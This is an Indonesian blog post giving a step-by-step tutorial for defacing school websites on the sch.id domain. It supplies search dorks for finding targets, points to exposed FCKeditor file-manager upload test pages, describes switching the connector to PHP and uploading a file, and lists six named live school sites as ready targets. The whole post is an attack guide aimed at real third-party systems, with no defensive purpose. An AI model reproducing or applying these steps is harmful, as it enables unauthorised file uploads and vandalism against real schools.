Tutorial Hacking- Cara deface sch.id

Bahan:
- File txt (bikin di notepad)


Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?


Exploit:
/editor/filemanager/connectors/test.html

/editor/filemanager/connectors/uploadtest.html

PAKAI SALAH SATU EXPLOITNYA



1. Contoh:
http://blabla.sch.id/html/siswa.php
http://blabla.sch.id/html/alumni.php
http://blabla.sch.id/html/guru.php


2. Ganti jadi:
http://blabla.sch.id/editor/filemanager/connectors/uploadtest.html

3. Ganti ASP Jadi PHP

4. masukan file txt yang sudah disiapkan (open -> upload)

5. Hasilnya:  http://xxx.sch.id/userfiles/file/nama-file.txt



Nih, buat yang males nyari langsung aja yang sudah disiapkan:


live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html















Big Thanks to: JokerTeam Child





Tutorial Hacking- Cara deface sch.id Tutorial Hacking- Cara deface sch.id Reviewed by Naufal Umar on 18:46 Rating: 5

No comments:

Powered by Blogger.